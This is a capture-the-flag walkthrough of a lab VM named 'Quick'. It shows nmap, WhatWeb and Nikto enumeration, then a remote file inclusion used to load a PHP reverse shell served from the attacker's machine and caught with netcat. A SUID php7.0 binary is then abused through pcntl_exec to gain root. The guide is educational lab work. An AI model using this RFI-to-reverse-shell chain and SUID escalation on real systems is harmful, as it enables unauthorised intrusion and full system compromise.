Through this machine, we learn about various enumeration techniques, including using tools like Nmap, Nikto, and WhatWeb to identify open ports, services, and potential vulnerabilities. We also explore manual enumeration by inspecting web pages, URLs, and file structures to uncover possible attack vectors such as Remote File Inclusion (RFI) and Local File Inclusion (LFI).
The privilege escalation phase highlights the importance of identifying SUID files and leveraging them to escalate privileges to gain higher access rights. In this case, exploiting the SUID bit set on the /usr/bin/php7.0 file allows us to execute arbitrary commands with root privileges, leading to a full compromise of the target system.
This machine underscores the significance of thorough enumeration and understanding of common vulnerabilities to exploit web applications effectively. It also emphasizes the importance of post-exploitation activities such as privilege escalation to gain maximum control over the target system.
vm link
» Make a new directory for machine and change to that directory
1
2
3
4
5
| ┌──(kali㉿kali)-[~]
└─$ cd Desktop/quick
┌──(kali㉿kali)-[~/Desktop/quick]
└─$
|
» Find our own IP (attacker IP)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:21:b1:d0 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.136/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0
valid_lft 6926sec preferred_lft 6926sec
inet6 fe80::f913:6113:d2c9:4db2/64 scope link noprefixroute
valid_lft forever preferred_lft forever
|
- Note our IP we will need it later.
» Let’s find the IP address of our target on our virtual network, we can do this with fping
1
2
3
4
5
6
7
8
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ fping -ag 192.168.0.136/24 2> /dev/null
192.168.0.1
192.168.0.115
192.168.0.136
192.168.0.142
192.168.0.147
192.168.0.151
|
- In Our case target IP is 192.168.0.142
» Create a variable for the IP to avoid retyping the address each time
1
2
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ ip=192.168.0.142
|
Enumeration
» Let’s ping our target
1
2
3
4
5
6
7
8
9
10
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ ping -c 3 $ip
PING 192.168.0.142 (192.168.0.142) 56(84) bytes of data.
64 bytes from 192.168.0.142: icmp_seq=1 ttl=64 time=0.514 ms
64 bytes from 192.168.0.142: icmp_seq=2 ttl=64 time=0.711 ms
64 bytes from 192.168.0.142: icmp_seq=3 ttl=64 time=0.638 ms
--- 192.168.0.142 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2129ms
rtt min/avg/max/mdev = 0.514/0.621/0.711/0.081 ms
|
- TTL value 64 in the response suggests the target is a Linux operating system.
» Scan for open ports and services using nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ sudo nmap -sC -sV -T4 -A -O -p- $ip
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 11:49 EST
Nmap scan report for 192.168.0.142
Host is up (0.00064s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick Automative
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.64 ms 192.168.0.142
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.79 seconds
|
- Take note of the scan result
- Linux (Ubuntu)
- Port 80
- HTTP
- Apache 2.4.41
- Title: Quick Automative
» Enumerate the service using WhatWeb
1
2
3
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ whatweb http://$ip
http://192.168.0.142 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.0.142], Script[text/javascript], Title[Quick Automative]
|
» Let’s open the website in the browser
1
2
3
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ firefox $ip &
[1] 31479
|
Thoroughly explore the website by navigating through all pages and forms while checking the URLs
- While navigating the website, the URL changed, and the argument in the URL suggests a potential vulnerability for Local File Inclusion (LFI) or Remote File Inclusion (RFI). Let’s confirm this vulnerability and scan for others using nikto.
» Nikto scan result
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ nikto -h $ip
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.0.142
+ Target Hostname: 192.168.0.142
+ Target Port: 80
+ Start Time: 2024-02-04 12:34:05 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https//developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the useragent to render the content of the site in a different fashion to the MIME tpe. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilitie/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). pache 2.2.34 is the EOL for the 2.x branch.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1".See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosd
+ /images: The web server may reveal its internal or real IP in the Locationheader via a request to with HTTP/1.0. The value is "127.0.1.1". See: http:/cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Web Server returns a valid response with junk HTTP methods which may case false positives.
+ /images/: Directory indexing found.
+ /index.php: Output from the phpinfo() function was found.
+ /index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c68658487015a2
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-02-04 12:34:50 (GMT-5) (45 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
|
- Nikto has detected the Remote File Inclusion (RFI) vulnerability.
» Let’s copy the PHP webshell to our working directory and open it with Visual Code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
┌──(kali㉿kali)-[~/Desktop/quick]
└─$ ls
shell.php
┌──(kali㉿kali)-[~/Desktop/quick]
└─$ code shell.php
┏━(Message from Kali developers)
┃ code is not the binary you may be expecting.
┃ You are looking for \"code-oss\"
┃ Starting code-oss for you...
┗━
|
Replace with your local IP, save and close
» Start HTTP server with python
1
2
3
4
5
6
7
8
9
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ ll
total 8
-rwxr-xr-x 1 kali kali 5512 Feb 4 12:59 shell.php
┌──(kali㉿kali)-[~/Desktop/quick]
└─$ sudo python3 -m http.server 80
[sudo] password for kali:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
|
» Open a new terminal and initiate the Netcat listener on port 1234.
1
2
3
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
|
Initial access
» Update the URL with our local IP address
Upon pressing enter, the reverse (web)shell should establish a connection to our Netcat listener
1
2
3
4
5
6
7
8
9
10
11
| ┌──(kali㉿kali)-[~/Desktop/quick]
└─$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.0.136] from (UNKNOWN) [192.168.0.142] 50894
Linux quick 5.4.0-169-generic #187-Ubuntu SMP Thu Nov 23 14:52:28 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
18:10:58 up 1:51, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
andrew tty1 - 16:27 1:43m 0.06s 0.03s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| $ whoami;id;hostname;ip a; pwd
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
quick
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:41:d3:56 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.142/24 brd 192.168.0.255 scope global dynamic enp0s3
valid_lft 6900sec preferred_lft 6900sec
inet6 fe80::a00:27ff:fe41:d356/64 scope link
valid_lft forever preferred_lft forever
/
$
|
As we’re currently operating as www-data and need more privileges, let’s enhance our shell.
1
2
| $ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@quick:/$
|
» Enumerate the home directories of the users and begin searching for our flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| www-data@quick:/$ ls -ahlR /home
ls -ahlR /home
/home:
total 12K
drwxr-xr-x 3 root root 4.0K Dec 16 14:38 .
drwxr-xr-x 20 root root 4.0K Dec 16 14:28 ..
drwxr-xr-x 7 andrew andrew 4.0K Dec 16 18:36 andrew
/home/andrew:
total 48K
drwxr-xr-x 7 andrew andrew 4.0K Dec 16 18:36 .
drwxr-xr-x 3 root root 4.0K Dec 16 14:38 ..
-rw------- 1 andrew andrew 75 Dec 16 18:50 .bash_history
-rw-r--r-- 1 andrew andrew 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 andrew andrew 3.7K Feb 25 2020 .bashrc
drwx------ 2 andrew andrew 4.0K Dec 16 14:39 .cache
drwx------ 3 andrew andrew 4.0K Dec 16 18:34 .gnupg
drwxrwxr-x 3 andrew andrew 4.0K Dec 16 18:21 .local
-rw-r--r-- 1 andrew andrew 807 Feb 25 2020 .profile
drwx------ 2 andrew andrew 4.0K Dec 16 14:39 .ssh
-rw-r--r-- 1 andrew andrew 0 Dec 16 14:39 .sudo_as_admin_successful
drwx------ 3 andrew andrew 4.0K Dec 16 18:26 snap
-rw-rw-r-- 1 andrew andrew 1.1K Dec 16 18:21 user.txt
ls: cannot open directory '/home/andrew/.cache': Permission denied
ls: cannot open directory '/home/andrew/.gnupg': Permission denied
/home/andrew/.local:
total 12K
drwxrwxr-x 3 andrew andrew 4.0K Dec 16 18:21 .
drwxr-xr-x 7 andrew andrew 4.0K Dec 16 18:36 ..
drwx------ 3 andrew andrew 4.0K Dec 16 18:21 share
ls: cannot open directory '/home/andrew/.local/share': Permission denied
ls: cannot open directory '/home/andrew/.ssh': Permission denied
ls: cannot open directory '/home/andrew/snap': Permission denied
|
- Capture the user flag since it has permissions allowing it to be read by everyone.
» One crucial check on a target is to identify any unknown SUID files on the system. Let’s search for SUID files, and if they are unfamiliar to the system, there might be potential for exploitation.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| www-data@quick:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/snap/core20/1828/usr/bin/chfn
/snap/core20/1828/usr/bin/chsh
/snap/core20/1828/usr/bin/gpasswd
/snap/core20/1828/usr/bin/mount
/snap/core20/1828/usr/bin/newgrp
/snap/core20/1828/usr/bin/passwd
/snap/core20/1828/usr/bin/su
/snap/core20/1828/usr/bin/sudo
/snap/core20/1828/usr/bin/umount
/snap/core20/1828/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1828/usr/lib/openssh/ssh-keysign
/snap/core20/2105/usr/bin/chfn
/snap/core20/2105/usr/bin/chsh
/snap/core20/2105/usr/bin/gpasswd
/snap/core20/2105/usr/bin/mount
/snap/core20/2105/usr/bin/newgrp
/snap/core20/2105/usr/bin/passwd
/snap/core20/2105/usr/bin/su
/snap/core20/2105/usr/bin/sudo
/snap/core20/2105/usr/bin/umount
/snap/core20/2105/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2105/usr/lib/openssh/ssh-keysign
/snap/snapd/18357/usr/lib/snapd/snap-confine
/snap/snapd/20671/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/bin/at
/usr/bin/sudo
/usr/bin/umount
/usr/bin/mount
/usr/bin/chsh
/usr/bin/su
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/php7.0
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/fusermount
|
- We can see that /usr/bin/php7.0 is an SUID file, let’s refer to GTFObins to explore possible exploitation methods.
Privilege escalation
» Exploit (refer GTFObins link)
1
2
3
4
5
| www-data@quick:/$ CMD="/bin/sh"
CMD="/bin/sh"
www-data@quick:/$ /usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"
/usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"
#
|
- With the obtained interactive shell, let’s inspect our identity, role, and the working environment.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
| # whoami;id;hostname;pwd;ip a
whoami;id;hostname;pwd;ip a
root
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)
quick
/
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:41:d3:56 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.142/24 brd 192.168.0.255 scope global dynamic enp0s3
valid_lft 5912sec preferred_lft 5912sec
inet6 fe80::a00:27ff:fe41:d356/64 scope link
valid_lft forever preferred_lft forever
#
|
Great! Now that we have root access, let’s capture the root flag.
1
2
3
4
| # ls /root
ls /root
root.txt snap
#
|
pwned
